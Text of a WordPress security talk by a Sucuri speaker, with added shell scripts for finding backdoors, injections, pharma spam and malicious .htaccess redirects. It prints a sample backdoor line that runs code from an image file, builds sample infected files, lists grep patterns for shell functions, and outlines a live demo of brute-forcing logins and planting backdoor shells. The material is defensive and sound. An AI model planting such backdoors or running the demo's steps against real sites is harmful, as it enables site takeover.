WordPress Security - Dealing With Today's Hacks


WordPress Security: Dealing with Today’s Hacks

04/11/2023 @sucuri_security @perezbox #wclv

Sucuri @ WordCamp: # whois perezbox

ID: Tony Perez

WHO: The Hulk

Username: Perezbox

Process: Sucuri

Services: InfoSec, Harley’s, MMA, Guns

GeoIP: Menifee, California


Why listen to me? You don’t have to, but…

I am not a designer or developer; my passion is Information Security, specifically Web Security.

Not an expert, just a passionate enthusiast.

I don’t like people, I like packets, signatures and the terminal.

Seriously though, our company:

Remediates 200 – 300 infected websites a day, 24/7/365

Performs 2 million+ malware website scans a month

Supports all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc.)

Thoughts To Kick Things Off

Information Security is about risk reduction.

If you’re looking for the “silver bullet” this is the wrong talk for you.

To think that you will never be infected or that you are immune to hacks is like saying you will never be sick.

If someone tells you the opposite you should slap them and have them pay you for wasting your time.

Prevention is ideal, detection is key… bats were created for ________ people…


Know Your Enemy

They have more time and resources

They are intelligent

The majority of attacks are automated

Goal is to impact as many people as possible

Mindset – own one, own them all…

It’s not personal, it’s business…

Ok, so what’s the problem?

TODAY’s ISSUES:

The Ecosystem / Environment

Access Control

Software Vulnerabilities

Administration

Credential Management

Extensibility

Today’s Focus

Ecosystem / Environment

Access Control

Dealing with Hacks

The EcoSystem / Environment

Apache: Malicious module injects iFrames
http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/

phpMyAdmin: Mirror hacked
http://sourceforge.net/blog/phpmyadmin-back-door/

PHP-CGI: Remote Code Execution
http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html

Plesk: Vulnerable to SQLi attacks
http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

Uh, what about WordPress?

Logical Architecture (the stack underneath a WordPress site)

Linux Operating System

Apache (+ Modules)

PHP (+ Modules)

MySQL

Applications on top: WordPress, cPanel, Plesk, phpMyAdmin, PHP-CGI

The EcoSystem / Environment

What can you do? Not much… it is completely outside of your control if you’re using a shared or managed host.

But you can reduce risk: use a Dedicated / VPS environment.

Recognize the responsibility that this entails, though; if what I mentioned previously doesn’t make sense, skip to the next step.

Go with a Managed Host: it doesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on.

Access is Key

On the Server:

Kill accounts that are not in use

FTP is the devil – slap yourself and switch to SFTP

Filter Shell / SFTP by IP & keys; keys at a minimum

Disable password authentication on the server

WordPress Admin:

Multi-Factor Authentication on wp-admin

Apache “Basic Access Authentication”

Two-Factor Authentication on wp-login.php (Duo Two-Factor Authentication plugin)

Employ least privilege:

Users with the “administrator” role are not needed for everyday tasks

Learn to use Editor, Author, Contributor, Subscriber

Gah!?!?!?!?!?!?!

WordPress Loving Infections

Defacements

Backdoors

Pharma Hack

Injections (iFrames specifically)

Malicious Redirects

Phishing

Before We Dive In

Linux / Unix tools: curl, find, grep, diff

Command Usage – Hunting TimThumb

# grep -Eir --include "*thumb.php" 'define.*VERSION' .

- Then –

# curl -A "Windows" http://timthumb.googlecode.com/svn/trunk/timthumb.php > /path-to-file/timthumb.php

(Adding -D - would dump the response headers to stdout and therefore into the saved file; inspect headers on a separate run.)

Command Usage – Identify Change

Detect Recent Changes

find . -type f -ctime -1 | more   - OR -   find ./ -type f -mtime -1

-ctime = inode/metadata change: 0 or -1 (within the past 24 hours)

-mtime = content modification: -1 (within 1 day) | -2 (within 2 days)

Detect Differences

diff -qr /path/dir1 /path/dir2
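The find/diff workflow above, as an added example that is not from the original deck: one function lists recently touched files, the other reduces `diff -qr` output against a known-clean copy to a list of changed or unexpected paths. All directory names are hypothetical; the demo builds a throwaway tree.

```shell
#!/bin/sh
# Added example (not from the original deck): list files touched in the last
# N days, then compare a live WordPress tree against a clean reference copy.
# All paths are hypothetical; the demo builds its own throwaway tree.

# Files whose metadata (ctime) or content (mtime) changed within $2 days.
recent_changes() {
    find "$1" -type f \( -ctime "-${2:-1}" -o -mtime "-${2:-1}" \) | sort
}

# Files that differ between a clean copy ($1) and the live tree ($2).
# diff -qr prints "Files A and B differ" and "Only in DIR: name" lines;
# both are reduced to a single path per line.
changed_files() {
    diff -qr "$1" "$2" | sed -n \
        -e 's/^Files .* and \(.*\) differ$/\1/p' \
        -e 's/^Only in \([^:]*\): \(.*\)$/\1\/\2/p' | sort
}

# Constructed demo: clean copy vs. live copy with one altered theme file
# and one file that does not exist in the clean copy at all.
demo() {
    t=$(mktemp -d)
    mkdir -p "$t/clean/wp-content/themes/t" "$t/live/wp-content/themes/t"
    echo '<?php get_header(); ?>' > "$t/clean/wp-content/themes/t/index.php"
    cp "$t/clean/wp-content/themes/t/index.php" "$t/live/wp-content/themes/t/"
    echo '<!-- injected -->' >> "$t/live/wp-content/themes/t/index.php"
    echo 'not in the clean copy' > "$t/live/wp-content/count1.php"
    changed_files "$t/clean" "$t/live"
    rm -rf "$t"
}
```

Keep the clean copy off the web server (a fresh download of the same WordPress, theme and plugin versions works), otherwise an attacker who owns the box can "fix" your baseline too.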

Defacements: Hacktivism at its finest… you now support a cause!?!?!

Defacements

Hacktivism 101: annoying as S*&T

Places to look:

index.html

index.php (root directory)

wp-content

Theme directory

grep is your friend: grep -ri 'sniper399' .

Backdoors: It’s ok to cry a little…

Backdoors

Common terms:

is_bot

eval

base64_decode

fopen

fclose

readfile

edoced_46esab (base64_decode reversed)

exec

system

shell_exec

gzuncompress

popen

FilesMan

grep -RPl --include='*.php' "(system|exec|passthru|shell_exec|base64_decode|eval) *\(" /var/www
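A two-pass version of the grep hunt above, added here as an example rather than taken from the deck: the first pass catches direct calls of the dangerous functions, the second catches the reversed names and tool markers from the term list that a plain function-name grep misses. The sample files are constructed inline.

```shell
#!/bin/sh
# Added example (not from the original deck): hunt a PHP tree for the backdoor
# indicators listed above. Pass one looks for direct calls of dangerous
# functions; pass two looks for the reversed names and tool markers that
# obfuscated shells use instead. Sample files are constructed below.

CALLS='\b(eval|system|exec|passthru|shell_exec|popen|base64_decode|gzuncompress|create_function)[[:space:]]*\('
MARKERS='edoced_46esab|strrev[[:space:]]*\(|FilesMan|is_bot'

# Files containing a direct call of one of the functions above.
hunt_calls() {
    grep -RlEi --include='*.php' "$CALLS" "$1" | sort
}

# Files containing an obfuscation marker.
hunt_markers() {
    grep -RlEi --include='*.php' "$MARKERS" "$1" | sort
}

# Every hit with file name and line number, for triage.
show_hits() {
    grep -RnEi --include='*.php' "$CALLS|$MARKERS" "$1"
}

# Constructed sample tree: a clean theme template, one dropped-in file under
# a hidden ".tmp" directory, and one theme file using a reversed function name.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads/.tmp" "$d/wp-content/themes/t"
    printf '<?php get_header(); the_content(); get_footer();\n' \
        > "$d/wp-content/themes/t/index.php"
    printf '<?php @eval(base64_decode("ZWNobyAxOw=="));\n' \
        > "$d/wp-content/uploads/.tmp/img.php"
    printf '<?php $f = strrev("edoced_46esab"); echo $f("MQ==");\n' \
        > "$d/wp-content/themes/t/footer.php"
    echo "$d"
}
```

Expect hits in legitimate plugins too (image libraries call gzuncompress, caching plugins call base64_decode); the value is in the hit list being short enough to read, and in new hits appearing where yesterday there were none.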

Pharma Hack: Erectile dysfunction pills are the leading ads… who knew…

Pharma Hack: Multi-million $ business

Rarely distributes malware

Impression-based affiliate marketing

Google’s Search Engine Result Pages (SERP)

Odds of malware distribution are actually low

Tricks: embedded within core files

Look for “.tmp” directories

Pharma Hack, cntd..

Try using curl to emulate Google and Windows:

curl -L -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://someinfectedwebsite.com

Google Webmaster Tools: Fetch as Googlebot

Check your theme’s index.php file for things like this:

<?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/my-really-good-theme/images/s.jpg'));$wp__theme_icon(); ?>
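The Googlebot trick above becomes a cloaking check when you fetch the page twice and compare the link sets; this added example (not from the deck) does that. `fetch_as` wraps curl for live use; `compare_views` works on saved copies, so the demo runs offline on two constructed HTML files.

```shell
#!/bin/sh
# Added example (not from the original deck): fetch a page as a browser and as
# Googlebot, then report links that exist only in the Googlebot view. Pharma
# injections commonly cloak their spam links this way. compare_views works on
# saved files so it can be demonstrated offline on constructed HTML.

GOOGLEBOT='Googlebot/2.1 (+http://www.google.com/bot.html)'
BROWSER='Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36'

# Save URL $1 as seen with User-Agent $2 into file $3 (follows redirects).
fetch_as() {
    curl -sL -A "$2" -o "$3" "$1"
}

# href targets of a saved page, one per line, sorted and unique.
links_in() {
    grep -oEi 'href="[^"]*"' "$1" | cut -d'"' -f2 | sort -u
}

# Links present in the bot view ($2) but absent from the browser view ($1).
compare_views() {
    browser_links=$(mktemp); bot_links=$(mktemp)
    links_in "$1" > "$browser_links"
    links_in "$2" > "$bot_links"
    comm -13 "$browser_links" "$bot_links"
    rm -f "$browser_links" "$bot_links"
}

# Constructed sample: identical pages except for a hidden link block that the
# injection only serves to search-engine user agents.
make_sample() {
    d=$(mktemp -d)
    cat > "$d/browser.html" <<'EOF'
<html><body><a href="/about/">About</a><a href="/blog/">Blog</a></body></html>
EOF
    cat > "$d/bot.html" <<'EOF'
<html><body><a href="/about/">About</a><a href="/blog/">Blog</a>
<div style="display:none"><a href="http://pills-example.invalid/buy">cheap pills</a></div>
</body></html>
EOF
    echo "$d"
}

# Live use: fetch_as URL "$BROWSER" b.html; fetch_as URL "$GOOGLEBOT" g.html;
# compare_views b.html g.html
```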

Pharma Hack, cntd..

Injections: It only hurts for a minute…

Injections

Invisible iFrames executing in your browser

Contributing to drive-by downloads, pharma, XSS, CSRF

Places to check – pages that generate content: JS files, header.php, index.php, functions.php, footer.php

Injections, cntd…

PHP iFrame Injection => count##.php

Check all index.php / theme JS files

Example below:

Injections, cntd…

Pharma Link Injections =>

Drive-by downloads

Malicious Redirects: WTF?!?! Why don’t I understand what it says?

Malicious Redirects: redirect your users to a domain distributing malware; fundamentally different from an iFrame injection that executes in your browser

8 out of 10 times, check your .htaccess file – all of them:

# find /var/www -name .htaccess -type f | wc -l

Check for backdoors also – often a sign of a bigger issue
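Counting .htaccess files is the first step; the added example below (not from the deck) goes one further and flags the ones carrying an external redirect or a User-Agent / Referer condition, which is the shape conditional redirects usually take. The sample tree is constructed inline and /var/www is only an assumed root.

```shell
#!/bin/sh
# Added example (not from the original deck): inventory every .htaccess under
# the web root and flag the ones that redirect or rewrite to another host, or
# that switch behaviour on User-Agent / Referer the way conditional redirects
# do. The sample tree is constructed here; /var/www is only an assumed root.

# All .htaccess files (pipe through wc -l for the count on the slide).
list_htaccess() {
    find "$1" -name .htaccess -type f | sort
}

# .htaccess files with a Redirect/RewriteRule to an absolute http(s) URL,
# or a RewriteCond on the User-Agent or Referer header.
suspicious_htaccess() {
    list_htaccess "$1" | while read -r f; do
        if grep -qEi '^[[:space:]]*(Redirect(Match|Permanent)?|RewriteRule)[^#]*https?://' "$f" ||
           grep -qEi '^[[:space:]]*RewriteCond[[:space:]]+%\{HTTP_(USER_AGENT|REFERER)\}' "$f"; then
            echo "$f"
        fi
    done
}

# Constructed sample: a stock WordPress .htaccess and a tampered one that
# sends visitors arriving from a search engine to an external domain.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads"
    cat > "$d/.htaccess" <<'EOF'
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule . /index.php [L]
# END WordPress
EOF
    cat > "$d/wp-content/uploads/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing)\. [NC]
RewriteRule .* http://redirect-target.invalid/ [R,L]
EOF
    echo "$d"
}
```

A hit is not proof: a redirect to your own canonical domain is normal, so read every flagged file before touching it, and remember that an .htaccess in a directory you never created is a finding on its own.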

Phishing: Biggest growing problem, exceptionally difficult to detect…

Phishing

Growing at a faster pace than traditional web malware

No impact to readers, but tied to SPAM bots sending out emails like this:

Phishing, cntd…

Demonstration: Bringing the Point Home

Demo Objective

Use good tools for bad things – wpscan

Enumerate the users

Brute force the user accounts’ passwords

Insert an arbitrary backdoor shell for remote execution

Deface the website

Insert another shell backdoor that provides an interface

I have 5 minutes – ready?

Keeping it Real: Remember the risk discussion?

Guard Access: Revisit Slide 12 – access, access, access

It always comes down to access

We have to change the way we treat and think about access. All access – server / application.

We are making the same mistakes servers and desktops were making in the 90’s with access.

Know where you are surfing the web: do you really need to log in as an admin at the coffee shop?

Password Dilemma

15 character password: 3 months to crack

Long / Complex / Unique: the key to passwords

Prefer a password manager. You don’t? ok..

Passphrases work too: iLuvWCLVegas:2012:HrtAttckGrll

Come up with a process that works, stick to it:

One scheme: remember 8 characters, write down 8 characters, save 20 characters

Second scheme: remember 20 characters, prefix characters with the site name, end the sequence with some date

Kill PHP Execution

Kill PHP execution in these directories:

wp-includes

wp-content

uploads – at a minimum

<Files *.php>

Deny from all

</Files>
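Added note, not part of the original slide: `Deny from all` is Apache 2.2 syntax and only works on Apache 2.4 when mod_access_compat is loaded; the 2.4 equivalent is `Require all denied`, and a `FilesMatch` pattern also covers alternate PHP extensions. Before applying this to wp-content as a whole, confirm that none of your plugins serve PHP files directly from their own directories.

```apache
# wp-content/uploads/.htaccess, Apache 2.4 form (added here, not from the slide).
# Only honoured where the server config sets AllowOverride to permit it.
<FilesMatch "\.(php|phtml|php[0-9])$">
    Require all denied
</FilesMatch>
```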

Disable Theme / Plugin Editor

I’d take it a step further and remove the ability to install, but that’s just me.

Modify wp-config.php with:

Disable the Plugin / Theme Editor: define('DISALLOW_FILE_EDIT', true);

- OR -

Disable Plugin / Theme updates and installation: define('DISALLOW_FILE_MODS', true);

Update: Oldest version found in production – 1.5

Leading cause of cross-site contamination issues

Perhaps the simplest of tasks, yet we still find this:

Plugins That Help

Clients:

Sucuri Security Premium

Duo Two-Factor Authentication

Theme-Check

BackupBuddy

Akismet

Non-Clients:

Duo Two-Factor Authentication

Limit Login Attempts

Theme-Check

BackupBuddy

Akismet

Need a Hand?

Online Resources:

Sucuri Blog: http://blog.sucuri.net

SiteCheck Scanner: http://sitecheck.sucuri.net

Unmask Parasites: http://unmaskparasites.com

Perishable Press: http://perishablepress.com/category/web-design/security/

Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress

Support Forums:

Hacked – http://wordpress.org/tags/hacked

Malware – http://wordpress.org/tags/malware

BadwareBusters – https://badwarebusters.org

Sucuri

Tony Perez: http://sucuri.net | http://blog.sucuri.net

Twitter: @sucuri_security, @perezbox and @tonyonsecurity